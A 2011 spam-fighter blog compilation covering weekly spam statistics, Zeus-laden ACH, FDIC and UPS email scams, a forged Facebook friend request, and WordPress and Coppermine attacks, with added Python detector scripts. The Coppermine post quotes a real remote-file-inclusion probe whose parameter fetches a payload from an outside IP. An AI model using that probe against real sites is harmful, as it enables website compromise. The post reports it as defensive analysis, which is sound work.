August 30, 2011

ACH Email Fraud Morphs Into FDIC Notification Scam

It was only a couple of days ago (8/26/2011) that I published a blog article warning people about the threats contained in fraudulent emails claiming that an ACH transfer had been canceled and that the recipient needed to read the report in the attached file.

Beginning at 3 AM EST, I received four consecutive email scams in 15 minutes, with the subject "FDIC notification," the forged sender "[email protected]" (the actual "sender" is an infected PC in a spam botnet), and the following body text:


Dear customer,
Your account ACH and WIRE transaction have been temporarily suspended for
security reasons due to the expiration of your security version. To download and install the newest installations read the document(pdf) attached below.
As soon as it is setup, you transaction abilities will be fully restored.

Best Regards, Online Security departament, Federal Deposit Insurance Corporation.


The attached file is currently named "FDIC_document.zip" - although the filename may change soon.

Like the UPS and ACH scams that preceded it, this scam contains a variant of the Zeus or Zbot Trojan Horse. Its purpose is to install hidden malware that watches for you to visit targeted financial institutions, your website's control panel, PayPal, etc. Once you do, it intercepts your login credentials and forwards them to the criminals running these scams. Your bank accounts, PayPal accounts and God knows what else may be emptied before you know what hit you!

If you use MailWasher Pro to screen your incoming email for spam and threats in attachments, my custom ZIP Attachment filter will alert you to these and similar threats. Never open the attachments in these scams! Delete the email on sight! Opening these messages will launch the installer for the Zbot. Your PC will not only have the Zeus keylogger installed, but will be made a part of the Botnet from which you received your recruitment message.


August 28, 2011

Spam increases 11% over previous week: Aug 22-28, 2011

After a month of lower email spam volumes, this past week I saw an 11% increase over the previous week, which itself had a 7% increase from the week before. That makes about 18% more spam than two full weeks ago. Most troubling was the fact that a lot of this unwanted email contained malware infected attachments.

The last spam run containing infected attachments was a fake "ACH Payment Canceled" campaign. It started immediately after a run of fake Uniform Ticket email scams, and both contained the Zeus (a.k.a. Zbot) Trojan. This is a hidden keylogger that watches for victims to log in to particular banks, trust companies, PayPal, website control panels, or trading companies. It collects the login credentials and sends them in a data stream to the criminals renting the use of the botnet responsible for sending the spam run. They then steal your money, or hack your websites.

There was also a continuation of the previous week's fake Facebook Friend Requests, containing links leading to direct downloads of Trojans. I wrote about this scam earlier this week, in this article: Beware Fake Facebook Friend Requests, Leading to Malware. To date, all of the requests I have received have contained Arabic names in the subject, but, that may change next time the miscreants behind this scam send another spam blast.

Since I noticed last Sunday that the volume of spam was staying high, I returned to using MailWasher Pro 6.4 to block spam and collect statistics that are easy to view and use in my reports. The current new version, 2011, is fully capable of blocking as much of the spam as the older version, but lacks a statistics page as of this writing.

In case you were wondering, you can still purchase a licensed copy of MailWasher Pro 6.4 from the Firetrust website. Or, if you don't care about the Statistics readout but want faster processing, try the new version (same link).

Here are the basic stats for the last week's spam:

Total email received: 501
Amount classified as spam: 219
Percentage of spam: 43%
Number matched by my custom filters: 208
Number caught by my Blacklist: 5
Number identified by DNS Blacklists: 4
Reported to SpamCop: 29

Individual categories of spam follow...

Percentages of spam by category of filter.

Counterfeit Watches: 15.67%
Misc filters: 13.36%
Male Enhancement: 11.52%
Cialis (counterfeit): 11.52%
Weight Loss scams (HCG): 9.22%
Courier Scams (UPS): 9.22%
Pharmaceutical Spam: 8.76%
Software Spam: 5.99%
Zip Attachments (Zeus Trojan): 4.15%
.RU, .RO, or .UA links: 3.23%
Fake Facebook Friend Requests (Arabic names): 3.23%
My Custom Blacklist: 2.30%
DNS Blacklisted Email Servers: 1.84%

Updates to my Custom MailWasher Filters:

E-Card Scam,
Known Spam Domains,
.RU or .UA Domain Link (2x),
Software Spam.
New filter: Fake Facebook Friend Request.
Split Software Spam into 2 new filters: Software Spam [S] and Software Spam [B] and updated both.

New Blacklist entries:
[email protected] AND [email protected]

Note: I write and publish custom spam filters for both the old and new versions of MailWasher Pro.

I use and recommend MailWasher Pro (2011) to screen my incoming POP3 email for spam, scams and virus threats, before downloading anything to my Windows Live Mail email client.


August 26, 2011

Return of ACH Payment Canceled - Email Malware Scams

For the last 2 days I have seen a slowly building spam campaign featuring a previously used trick Subject: "ACH Payment (7 numbers) Canceled." The message body is short and sweet, along the lines of the following:


The ACH transaction,
recently initiated from your checking account (by you or any other person),
was canceled by the other financial institution.

Rejected transaction

Reason for rejection: See details in the attachment


The "report" is in a double extension file, with a name like: "report_082011-65.pdf.ZIP (ZIP archive, Adobe PDF)" - although future variants may arrive with just a .zip or just a .pdf extension.

The From line is usually: "account manager" ([email protected], or [email protected]). You will be getting these sent to every one of your email accounts, should you have multiple accounts, like I do. Domains with email are especially hard hit in today's spam campaigns.

The actual "sender" is a PC in a spam botnet, operating under commands from the Bot Master running this show. All reply-to and From information is forged.

The payload in the current crop of malware in attachments is the "Zeus" aka: "ZBot" keylogger Trojan. The installer may also make the victim's computer a member of the same botnet from which their scam message was sent. This perpetuates and increases the size of the botnet and steals money from victims as they log into banks and payment portals targeted by this Zeus variant.

My advice to recipients of one of these, or future variations of these scams, is to phone your bank or financial institution and ask them to check your account for problem transactions. Note, there have been some spam campaigns that include a fake contact phone number that actually leads to people hired by the criminals running particular campaigns. So, your safest bet is to look up the number for your bank, or flip over your debit or credit card and call the number listed on it.

Interestingly, these malware in attachments scams began on August 25, just after the previous run of UPS malware scams ended. No doubt, the same botnet is sending both, rotating subjects and body text and attachment names, via templates downloaded to the zombie computers in the botnet.

I delete all such malware laden spam messages, which are automatically flagged by one or more custom spam filters I write, by my email screening program: MailWasher Pro - (learn about MailWasher Pro here). My advice to you is to delete them on sight, without opening them. Phone your bank if you are worried.

If your bank sends you email messages and alerts about problems, the message will include your proper name. None of these scams include any personal names as salutations. That is red flag number one in all such malware and phishing scams.

Stay alert to scams in spams. Do not open any email attachments out of curiosity. Only open attachments you are expecting, from senders you are expecting them from, and then, only if you have modern, fully updated anti-virus/anti-malware protection running on your computers.


August 22, 2011

Beware Fake Facebook Friend Requests, Leading to Malware

Tonight I received what appeared to be a Facebook Friend Request, but it was addressed to an account not associated with Facebook. It was also suspiciously marked with gray icons in MailWasher Pro. This indicates that the anti-spam program wasn't sure if it was good or bad. That set off my alarm bells, because I have a custom filter that identifies all legitimate messages from Facebook as Good.

Luckily for me, I am a spam fighter and suspicion is my modus operandi. Had I been a casual computer user I may have curiously clicked on the link in this email and had my computer infected with a fake Flash Player update, plus an exploit attack kit, within seconds! Then I would have been Phished with a fake Facebook login page! Here is what I saw and what the source code revealed about the email message.

First, the headers:

Delivery-date: Sun, 21 Aug 2011 21:36:18 -0600
Received: from [123.236.135.113] (helo=ZDIHFSM)

my own server details removed

Received: from mta900.em.linkedin.com (mta900.em.linkedin.com [63.211.90.176])
by mail.rctengineering.com (8.13.8/8.13.8) with ESMTP id 2714Y3V654427
for ; Mon, 22 Aug 2011 09:05:39 +0530
Date: Mon, 22 Aug 2011 09:05:39 +0530

Subject: Zaahid Ababneh wants to be friends on Facebook.
From: Facebook <notification+gugsche@facebookmail.com>

Look at the bold portions of the above headers. The first bold line contains the date when this email was delivered to me by my email server, which is in Utah:
Sun, 21 Aug 2011 21:36:18 -0600

Directly underneath the arrival date is the last Received From line, indicating that the email was delivered to me from the IP address 123.236.135.113. If this email really came from Facebook, the IP address would resolve to one with facebook.com in a "Whois" look-up and in a reverse IP look-up. However, running a Whois check on this IP address revealed that, rather than belonging to Facebook, it is registered to Reliance Communications, in Mumbai, India!

Moving down to the next Received line, it says that the email was relayed through LinkedIn. Now, why would Facebook need to use LinkedIn servers? They absolutely would NOT. Also, note that the email was handed to the LinkedIn mail server by the rctengineering.com domain, not Facebook. That domain belongs to a Bell South customer!

Now, look at the date when the email was relayed through the alleged LinkedIn server: Mon, 22 Aug 2011 09:05:39 +0530. That date is almost 12 hours in the future from when my email server in the USA received the message. I ran a look-up of timezones and found that +5:30 belongs to India. That coincides with the IP address of the Received From line at the beginning (which is the final email hand-off). That proves that the message did indeed come from India and was not associated with any Facebook email servers in the USA, or anywhere else.


Another giveaway is the name in the email address of the sender of the notification. It is almost always somehow related to the actual name of the person wishing to become friends with a Facebook user. But, this time, the name in the email address prefix was nothing like the Arabic name in the Subject line. Rather, it was "gugsche".

With so much wrong in the headers I took a look at the source code in the message body. After scrolling down through numerous lines of code and images, I finally arrived at the payload link, near the bottom. The anchor text (the text inside the opening and closing link tags) said "Confirm Friend Request" - but the actual destination of the hidden hyperlink was not anywhere on Facebook.com. Instead, the link pointed to "session74815472744961.pmstdl.com/confirm/req/" (hovering over the link reveals this).

When I investigated this link, using a safe, non-exploitable browsing tool and a Whois look-up, I found that the domain belongs to a Russian person, going as Aleksei O Zhukov, in Moskovskaya Oblast, Russia. Every time I reloaded the link from the email, I ended up on a different IP address, hosting the exact same fake Facebook login phishing page. Rotating IP addresses is a common trick used by phishing scammers and drug spammers, to protect against total takedown of their criminal operation.

For the techies among you, the landing pages are all running Russian Nginx web servers.

There is a hidden iframe on the landing page, leading to exploit attacks on your browser. Furthermore, there is a fake Flash movie area, with a missing plugin notice and a link telling you to update your Flash Player. That update, titled "updateflash.exe" - leads to a malware infection you will regret. It is hosted on that very website, although it claims you will be updating at adobe.com. NOT!

Anybody who is tricked into clicking on the link in these fake Facebook Friend Requests is treated to three criminal exploits:

1. Your Facebook credentials are stolen and used by spammers and malware distributors.
2. Your browser is assaulted with a crimeware exploit pack.
3. You are tricked into installing fake/rogue anti-virus, or similar worthless software, which will claim that your PC is infected and will demand payment to clean the infections.


While your PC is held hostage by the fake security program you thought was a Flash update, a botnet will be installed in the background and possibly a key logger, to steal your online banking credentials.

My advice to anybody receiving a Facebook Friend Request is to find out how to display the complete headers and look over the information contained in them for inconsistencies. If it says Facebook, but the Received From mail servers are not from facebook.com and a Whois look-up of the sender's IP is not assigned to facebook.com, it is a scam. Hover over (but don't click) any links to accept the request, and read the actual URL destination in the status bar at the bottom of your email client or browser. If the first section after http:// and ending with the first forward slash (/) is not facebook.com, it is a hostile link. Delete the email immediately!

Stay safe my friends (Facebook and other)!

NB: I used MailWasher Pro to screen this and all incoming email. It can show the entire source code with the click of a button.
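The three header and link checks walked through above (no Received hop from the claimed brand, a relay timestamp carrying a foreign UTC offset, and a call-to-action link that lands off-domain) can be automated. The script below is an added example written for this article, not the author's MailWasher filter nor any Facebook code. It assumes the message is available as raw RFC 822 text; the sample message is constructed from the headers quoted in the post, with the recipient address and the "by ..." clause of the first hop made up because the post removed them, and the list of legitimate Facebook domains is an assumption for the example.

```python
import re
from email import message_from_string
from email.utils import parseaddr, parsedate_to_datetime
from urllib.parse import urlparse

# Assumption for this example: domains a genuine Facebook notification comes from / links to.
FACEBOOK_DOMAINS = ("facebook.com", "facebookmail.com")

# Constructed sample reproducing the headers quoted in the post. The "by mx.example.invalid"
# clause and the recipient address are made up; the post removed the real server details.
SAMPLE_MESSAGE = """\
Delivery-date: Sun, 21 Aug 2011 21:36:18 -0600
Received: from [123.236.135.113] (helo=ZDIHFSM)
\tby mx.example.invalid with esmtp; Sun, 21 Aug 2011 21:36:18 -0600
Received: from mta900.em.linkedin.com (mta900.em.linkedin.com [63.211.90.176])
\tby mail.rctengineering.com (8.13.8/8.13.8) with ESMTP id 2714Y3V654427
\tfor <victim@example.invalid>; Mon, 22 Aug 2011 09:05:39 +0530
Date: Mon, 22 Aug 2011 09:05:39 +0530
Subject: Zaahid Ababneh wants to be friends on Facebook.
From: Facebook <notification+gugsche@facebookmail.com>
Content-Type: text/html

<html><body><a href="http://session74815472744961.pmstdl.com/confirm/req/">
Confirm Friend Request</a></body></html>
"""


def belongs_to(host, domains):
    """True if host is one of the given domains or a subdomain of one (never a look-alike)."""
    host = host.lower().strip("[]")
    return any(host == d or host.endswith("." + d) for d in domains)


def hop_hosts(received):
    """Extract the 'from' and 'by' host names of one Received header (folding is tolerated)."""
    frm = re.search(r"\bfrom\s+(\S+)", received)
    by = re.search(r"\bby\s+(\S+)", received)
    return (frm.group(1) if frm else None, by.group(1) if by else None)


def hop_offset(received):
    """UTC offset of the timestamp after the final ';' of a Received header, or None."""
    if ";" not in received:
        return None
    stamp = received.rsplit(";", 1)[1].strip()
    try:
        return parsedate_to_datetime(stamp).utcoffset()
    except (TypeError, ValueError):
        return None


def link_hosts(msg):
    """Host names of every href in the text/HTML parts of the message."""
    hosts = []
    for part in msg.walk():
        if part.get_content_type() not in ("text/html", "text/plain"):
            continue
        body = part.get_payload(decode=True).decode("utf-8", "replace")
        for url in re.findall(r'href=["\']?([^"\'\s>]+)', body):
            host = urlparse(url).hostname
            if host:
                hosts.append(host)
    return hosts


def analyse(raw, brand_domains=FACEBOOK_DOMAINS):
    """Return the list of red flags found; an empty list means nothing inconsistent was seen."""
    msg = message_from_string(raw)
    flags = []
    sender_domain = parseaddr(msg.get("From", ""))[1].rpartition("@")[2]
    hops = msg.get_all("Received", [])

    # 1. Mail that claims to be from the brand should show at least one hop handed off by it.
    if belongs_to(sender_domain, brand_domains):
        from_hosts = [h for h, _ in map(hop_hosts, hops) if h]
        if not any(belongs_to(h, brand_domains) for h in from_hosts):
            flags.append(f"From claims {sender_domain} but no Received hop came from it: {from_hosts}")

    # 2. A relay stamped in a UTC offset unlike the receiving server's points elsewhere.
    delivered = msg.get("Delivery-date")
    if delivered:
        local = parsedate_to_datetime(delivered).utcoffset()
        for hop in hops:
            off = hop_offset(hop)
            if off is not None and off != local:
                flags.append(f"hop from {hop_hosts(hop)[0]} stamped with UTC offset {off}, local is {local}")

    # 3. The call-to-action link must land on the brand's own domain.
    for host in link_hosts(msg):
        if not belongs_to(host, brand_domains):
            flags.append(f"link points off-brand: {host}")
    return flags


if __name__ == "__main__":
    for flag in analyse(SAMPLE_MESSAGE):
        print("RED FLAG:", flag)
```

Run against the sample, the script reports all three flags the article found by hand. The suffix check in belongs_to is deliberate: "facebook.com.evil.example" must not pass, which is why the host is compared against the domain with a leading dot rather than with a substring search.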


Huge Coppermine Maze Theme Attack on Aug 21-22, 2011

I have detected a huge exploit probe attack against the Maze theme interface for Coppermine web photo galleries, targeting my blog. Hundreds of probes were launched tonight, August 21 through 22, 2011, from the IP address 64.31.60.72 - a static IP which belongs to Limestone Networks, in Dallas, Texas.

Here is a tiny excerpt of the attack, meant to exploit a vulnerability in the Coppermine-Maze Theme, to include hostile files and codes into a blog, or photo gallery, via a vulnerable and unpatched Coppermine theme:

64.31.60.72 - - [21/Aug/2011:14:55:18 -0600] "GET /blogs/2009/11//modules/coppermine/themes/maze/theme.php?THEME_DIR=http://184.22.121.212:60000/byroe.jpg?? HTTP/1.1" 405 766 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"

You will note that the URL where the exploit code is hosted is shown to be http://184.22.121.212 - which resolves to 184-22-121-212.static.hostnoc.net. The exploit is defined in the RFI (Remote File Inclusion) Vulnerabilities Scanner, at the OSSEC Wiki, as: "$rfi371="modules/coppermine/themes/maze/theme.php?THEME_DIR=";" That exploit code has been in the wild since April 2004, according to Security Tracker.

If you are running the Coppermine Photo Gallery software on a website under your control, check your access logs to see if you have been hit by this attack. Then, look at the server response codes and see if any are code 200. If so, you are probably hacked. I feed them a Server 405: Method Not Allowed. Next, log into your Coppermine admin panel and go over every setting to see what, if anything, has been changed without your knowledge. Visit your gallery using Firefox, with the NoScript add-on installed and active. View the source code of your gallery web pages and press Control + A to highlight all text and code. Look for 1x1 px iframes with links to outside websites and other bad code, like JavaScript or meta refresh redirects.
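The log check described above (find requests whose query string smuggles a remote URL into a theme parameter, then sort them by response code) is easy to script. The following is an added example for this article, not part of Coppermine or of the OSSEC scanner it mentions. It assumes the web server writes the Apache "combined" log format; the sample log consists of the probe line quoted in the post plus two constructed lines (a second probe that the server answered with 200, and an ordinary gallery visit) so the report has something to separate.

```python
import re
from collections import Counter
from urllib.parse import parse_qs, urlparse

# Apache/NCSA "combined" format (assumption: the gallery host logs in this format).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Constructed sample: line 1 is the probe quoted in the post; lines 2 and 3 are made up.
SAMPLE_LOG = """\
64.31.60.72 - - [21/Aug/2011:14:55:18 -0600] "GET /blogs/2009/11//modules/coppermine/themes/maze/theme.php?THEME_DIR=http://184.22.121.212:60000/byroe.jpg?? HTTP/1.1" 405 766 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
64.31.60.72 - - [21/Aug/2011:14:55:19 -0600] "GET /gallery/themes/maze/theme.php?THEME_DIR=http://184.22.121.212:60000/byroe.jpg?? HTTP/1.1" 200 1200 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
192.0.2.10 - - [21/Aug/2011:15:01:02 -0600] "GET /gallery/thumbnails.php?album=3 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

# A parameter value starting with one of these is a remote file inclusion attempt.
RFI_SCHEMES = ("http://", "https://", "ftp://")


def parse_line(line):
    """Split one combined-format log line into named fields, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def rfi_include(url):
    """If any query parameter carries a remote URL, return (param, value); otherwise None."""
    query = urlparse(url).query
    for param, values in parse_qs(query, keep_blank_values=True).items():
        for value in values:
            if value.lower().startswith(RFI_SCHEMES):
                return param, value
    return None


def scan(log_text):
    """Return one record per RFI probe with the fields needed for triage."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if not rec:
            continue
        inc = rfi_include(rec["url"])
        if not inc:
            continue
        param, remote = inc
        status = int(rec["status"])
        hits.append({
            "ip": rec["ip"],
            "time": rec["time"],
            "path": urlparse(rec["url"]).path,
            "param": param,
            "remote": urlparse(remote).hostname,
            "status": status,
            # A 2xx answer means the script accepted the request; that line needs a human.
            "needs_review": 200 <= status < 300,
        })
    return hits


def summary(hits):
    """Probes per source IP, per payload host, and the subset the server answered 2xx."""
    return {
        "by_source": Counter(h["ip"] for h in hits),
        "by_payload_host": Counter(h["remote"] for h in hits),
        "needs_review": [h for h in hits if h["needs_review"]],
    }


if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    for hit in found:
        print(hit)
    print(summary(found))
```

Pipe a real access log into scan() by reading the file instead of SAMPLE_LOG; the "needs_review" entries are the ones to compare against the admin-panel and page-source checks the article goes on to describe.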

Remove any hostile changes, then save the cleaned pages. Check your server permissions to make sure that files are not writable by the World, just by the Owner (you). 644 (Read-Write for Owner, Read-only for Group and World) is the safest permission for html, script, and php files. Seek updates for Coppermine and for any themes you are using with it. Notify your web host of the exploit and have them run a vulnerability scan on your remaining pages and clean up anything you overlooked.

If you use an FTP client to upload files to your website, you can establish permissions on each remote file. Check the Help file that is part of the FTP program. If you use WS_FTP, on a Linux/Unix host, there is a right-click option labeled Properties, which opens a box that sets the numeric or actions permissions for any selected file, or group of selected files. Clicking OK after changing permissions makes the change take. If you see PHP or HTML files with 664, or 666 permissions, change them to 644, unless you know that they are safe to be left writable by the World (aka: Everyone) and Group.

If you use a web interface to manage files on your server, check the instructions for how to set or change file permissions on the server.
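If you have shell access to the host, the permission review in the three paragraphs above can be done in one pass over the document root instead of file by file in an FTP client. The script below is an added example for this article, not a Coppermine or WS_FTP feature. It walks a directory, lists every .php/.html/.htm file that Group or World can write, and optionally resets those to 644 as the article advises; the demo builds a small constructed tree in a temporary directory so it can be run safely anywhere.

```python
import os
import stat
import tempfile

WEB_EXTENSIONS = (".php", ".html", ".htm")
SAFE_MODE = 0o644                            # rw-r--r--: owner writes, everyone else reads
WRITE_BITS = stat.S_IWGRP | stat.S_IWOTH     # bits that make a file group- or world-writable


def risky_files(root):
    """Return (path, octal mode) for web files under root that Group or World can write."""
    found = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(WEB_EXTENSIONS):
                continue
            path = os.path.join(dirpath, name)
            if os.path.islink(path):         # do not follow links out of the document root
                continue
            mode = stat.S_IMODE(os.stat(path).st_mode)
            if mode & WRITE_BITS:
                found.append((path, oct(mode)))
    return found


def harden(root, apply=False):
    """List risky files; with apply=True also chmod each one to 644 and report the change."""
    changed = []
    for path, mode in risky_files(root):
        if apply:
            os.chmod(path, SAFE_MODE)
        changed.append((path, mode, oct(SAFE_MODE)))
    return changed


def demo():
    """Constructed sample tree: audit it, harden it, audit again; returns both findings."""
    root = tempfile.mkdtemp(prefix="cpg_perms_")
    layout = {"index.php": 0o666, "theme.php": 0o664, "about.html": 0o644, "notes.txt": 0o666}
    for name, mode in layout.items():
        path = os.path.join(root, name)
        with open(path, "w") as fh:
            fh.write("<?php // sample file ?>\n")
        os.chmod(path, mode)
    before = sorted(os.path.basename(p) for p, _ in risky_files(root))
    harden(root, apply=True)
    after = sorted(os.path.basename(p) for p, _ in risky_files(root))
    return before, after


if __name__ == "__main__":
    print(demo())
```

Run harden(root) first without apply to see what would change, then with apply=True; notes.txt is left alone on purpose because only the script and page types the article names are in scope.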

According to the Coppermine home page news, the latest stable version containing security patches is cpg1.5.12 (Security release - upgrade mandatory!), dated 02 January 2011. There is a very recent maintenance release: cpg1.5.14, dated August 1, 2011. I advise you to upgrade to the latest version on the Coppermine home page, if you have any older version number. Get on their mailing list to be notified about security updates, as they are issued.

Stay safe and keep your website safe for your visitors. As a Webmaster you must practice safe Hex! Do not assume that your web host will update software you have chosen to install. They won't do anything except shut down your account when it gets reported for infecting innocent visitors. If you don't know how to update web software, call your web host, ask for technical support and request assistance updating your galleries, blogs, themes, etc. They may charge you a fee, or not. You install it, you update it! It gets hacked, you fix it!


August 21, 2011

My Spam analysis & filter updates for the week of Aug 15 - 21, 2011

This week I am changing the nature of my spam report. In all previous articles, I used the "Statistics" from MailWasher Pro, version 6.x. However, this past week I switched to the latest version of MailWasher Pro: 2011. At this time it lacks a "Statistics" readout, so I have compiled my own stats. They reveal some interesting facts about this week's email spam.

The first thing I learned when going over the spam categories, in the MailWasher Pro Recycle Bin, was that the overall volume of spam is way up from last week. For the week ending on August 14, 2011, the total amount of spam received was 128. This week, ending August 21, the total was 175, as of the time I wrote this. Without an exact stat report, I am guesstimating that this represents about 33% of my total email this past week. That would make it about 5% more than last week.

Of these 175 spam emails, 169 were identified by my custom spam filters. Six more were classified as spam manually and entered into the learning filter, for future detections. The majority of spam was 44 messages touting fake Cialis. This was followed by 24 for counterfeit watches. Next in line were 15 emails promoting male enhancement herbs, then 13 each for weight loss drugs (illegal to import, or use without a face to face prescription; HCG drops) and finally, malware infected botnet Trojans inside zipfiles claiming to be invoices, delivery notices, etc.

Other lesser categories of spam included: Fake Diplomas, Lotteries, African senders, 419 scams, foreign language spam, miscellaneous pharmaceuticals, pirated software, Viagra, known spam domains and subjects, ISO encoded subjects, and my blocked countries filters.

The last major category, the infected zipfiles, are part of a huge attack that has been ongoing for three weeks in a row. Bot Herders, having lost control of millions of zombies when Microsoft, FireEye, the DOJ and other security research companies decapitated the Bredolab (in October 2010), Coreflood, Rustock, Waledac and other spam-spewing botnets this year, are hard at work rebuilding their armies of robotic malware slaves. Their most successful weapon seems to continue to be exploiting the weakest link in the chain of infection: human curiosity. Send out a gazillion spam messages about a pending or failed delivery, or an alleged speeding ticket, or failure to process an IRS refund or tax form, and thousands of curious, gullible people will open the attached zipfiles to see what the fuss is all about. Poof: they are botted!


This week I made 7 updates and/or additions to my custom filters:
Courier Scam #7 (UPS infected attachments),
HTML Spam Tricks,
.Info Images and Links (2 times),
Known Spam Subjects #4,
Software Spam,
Viagra Spam [B]

Don't let your PC become a zombie in a spam, or malware/phishing hosting, or DDoS attack botnet. Delete scam and spam emails on sight, and do not open any attachments unless you are specifically expecting them from the sender of that message - and then, only if you have state of the art, up to date anti virus protection watching as you open email messages.

I use and recommend MailWasher Pro (2011) to screen my incoming POP3 email for spam, scams and virus threats, before downloading anything to my Windows Live Mail email client.


August 14, 2011

My Spam analysis & filter updates for the week of Aug 7 - 14, 2011

This week I saw an increase in the amount of spam hitting my inbox. The percentage of spam was up 7% from the previous week. Actually, the greatest volume of spam occurred from Thursday through today. It was on August 11 that a giant spam run began with malware infected attachments, in scam emails claiming to be from the IRS and UPS.

Due to the huge influx of malware laden attachments in fake IRS ("could not process your return/refund") and UPS ("your package delivered ... print out invoice") messages, the top category last week was Zip file attachments, which led by more than double the amount of the runner up: male enhancement. While the enhancement and enlargement spam is a nuisance, the ones pretending to come from the IRS and UPS were downright dangerous. They contain botnet and key logging Trojans in zip files.

This past 7 days, spam for various types of unsolicited commercial email (UCE) amounted to 28% of my incoming email. This is according to MailWasher Pro, which I use to screen incoming email before downloading it to my desktop email program (Windows Live Mail). I report any spam messages that make it through my auto-delete filters to SpamCop.

Here are some statistics regarding the spam received and categorized, from Aug 7 - 14, 2011. These classifications are based upon my own custom MailWasher spam filters. Most of this spam is automatically deleted by MailWasher Pro and my custom filters. The statistics are obtained from the program's logs.

Statistics Overview

Percentage classified as spam: 28%; +7% from last week
Number of messages classified as spam: 128
Number classified by my custom spam filters: 122
Number and percentage of spam according to my custom blacklist: 3
Number classified as spam by the Bayesian Learning filter: 0
Number classified as spam according to DNS Blocklists (SpamCop, Spamhaus, etc): 1
Number of spam messages seen, reported to SpamCop & manually deleted: 52

The actual percentages of spam by category follow below.


The order of spam categories, according to the highest percentages, is as follows:

Zip, Rar, Gz Attachments (malware!): 37.30%
Male Enhancement scams: 15.87%
Fake Cialis: 9.52%
Weight Loss Scams (e.g. HCG): 7.14%
Known Spam Domains: 6.35%
URL Shortener spam link: 3.17%
Hidden ISO Subject: 2.38%
Counterfeit Watches: 2.38% (way down from last week!)
Pharmaceuticals spam: 2.38%
My Custom Blacklist: 2.38%
Base64 spam encoded message: 1.59%
DNS Blacklists (SpamCop, Spamhaus, etc): 0.79%
Other Filters (with small individual percentages): 8.73%

This week I made 1 update and/or addition to my custom filters:
Pump and Dump Scam

I made 1 addition to my custom Blacklist this week:
+@best*offers.com

There was one false positive last week, resulting in the removal of just one letter from the Male Enhancement filter. All other filters behaved as intended, or as updated. My filters are published in both the old and new MailWasher Pro formats. One type is for the latest 2011 series, in xml format, and two are for the previous series 6.x. One of those filters is set for manual deletions and the other for automatic deletions. You can read all about MailWasher Pro and the filters I write for it, on my MailWasher Pro Custom Filters page.

If you are having trouble caused by excess volumes of spam email, and are not using an effective filter, why not try out MailWasher Pro? Not only does it detect and block spam, but can also protect your PC from downloading harmful viruses, or other known threats.


August 7, 2011

My Spam analysis & filter updates for the week of Aug 1 - 7, 2011

This week finally gave me some measurable decline in the amount of spam hitting my inbox. The percentage of spam is down 6% from the previous week and the actual volume is down by even more. This is a reflection of the decline in revenues from spamvertised products and in the recent closure of several spam affiliate payment processors.

As for the top categories of spam, Male Enhancement took first place, followed by counterfeit watches, then fake Viagra, Cialis, weight loss drops, and other scams. There are still a considerable number of bogus diploma spams coming in, so some people must be stupid enough to purchase these worthless documents.

I see a repetitive pattern in certain types of spam, mostly for fake diplomas. The subjects are "RE: Hello" - "RE:Re:Hello" - "RE: RE:News" and similar. My Diploma and other existing filters pick them off based on the body text, with zero mistakes.

This past 7 days, spam for various types of unsolicited commercial email (UCE) amounted to 21% of my incoming email. This is according to MailWasher Pro, which I use to screen incoming email before downloading it to my desktop email program (Windows Live Mail). I report any spam messages that make it through my auto-delete filters to SpamCop.

Here are some statistics regarding the spam received and categorized, from Aug 1 - 7, 2011. These classifications are based upon my own custom MailWasher spam filters. Most of this spam is automatically deleted by MailWasher Pro and my custom filters. The statistics are obtained from the program's logs.

Statistics Overview

Percentage classified as spam: 21%; -6% from last week
Number of messages classified as spam: 85
Number classified by my custom spam filters: 75
Number and percentage of spam according to my custom blacklist: 3
Number classified as spam by the Bayesian Learning filter: 0
Number classified as spam according to DNS Blocklists (SpamCop, Spamhaus, etc): 1
Number of spam messages seen, reported to SpamCop & manually deleted: 13

The actual percentages of spam by category follow below.


The order of spam categories, according to the highest percentages, is as follows:

Male Enhancement scams: 26.58%
Counterfeit Watches: 11.39% (over double from last week!)
Fake Viagra: 8.86% (down 60%)
Fake Cialis: 7.59%
Weight Loss Scams (e.g. HCG): 7.59%
Known Spam Domains: 7.59%
Diploma Spam: 6.33% (down 1/3)
.RU (Russian) Domain Link: 5.06%
My Custom Blacklist: 3.80%
Lottery Scam: 2.53%
Non-English Language spam (apparently, Spanish and French): 2.53%
DNS Blacklists (SpamCop, Spamhaus, etc): 1.27%
Other Filters (with small individual percentages): 8.86%

This week I made 6 updates and/or additions to my custom filters:

Cialis filter re-enabled and edited,
Drugstore with spaced words,
Known Spam Domains,
Male Enhancement [S],
Split ".BR, .CN, .RU, .UA" filter into these 2 new filters:
    .BR & .CN Domain Link,
    and, .RU & .UA Domain Link

I made 1 addition to my custom Blacklist this week:
[email protected] (pump and dump stock scam)

There was one false positive last week, resulting in the removal of just one letter from the Male Enhancement filter. All other filters behaved as intended, or as updated. My filters are published in both the old and new MailWasher Pro formats. One type is for the latest 2011 series, in xml format, and two are for the previous series 6.x. One of those filters is set for manual deletions and the other for automatic deletions. You can read all about MailWasher Pro and the filters I write for it, on my MailWasher Pro Custom Filters page.

If you are having trouble caused by excess volumes of spam email, and are not using an effective filter, why not try out MailWasher Pro? Not only does it detect and block spam, but can also protect your PC from downloading harmful viruses, or other known threats.


August 3, 2011

Websites using WordPress image resizing themes need to take action Now

If you are a website owner or Webmaster and you have installed WordPress blog software with image gallery themes on your websites, you may have a big problem, effective 8/1/2011. These programs are complicated software and as such are subject to flaws caused by programming oversights. Exploitable scripting flaws have been discovered in a popular plug-in for themes: TimThumb. Those flaws are currently being used to inject malicious scripts and code into millions of web pages. You need to see if your website is vulnerable to these exploits in the wild.

The details

This particular problem doesn't lie inside the WordPress software itself, but in a third party "plug-in" used by image themes that allow resizing of uploaded images. Those images may be uploaded by the owner of the blog, or by visitors from the Internet. Therein lies the danger.

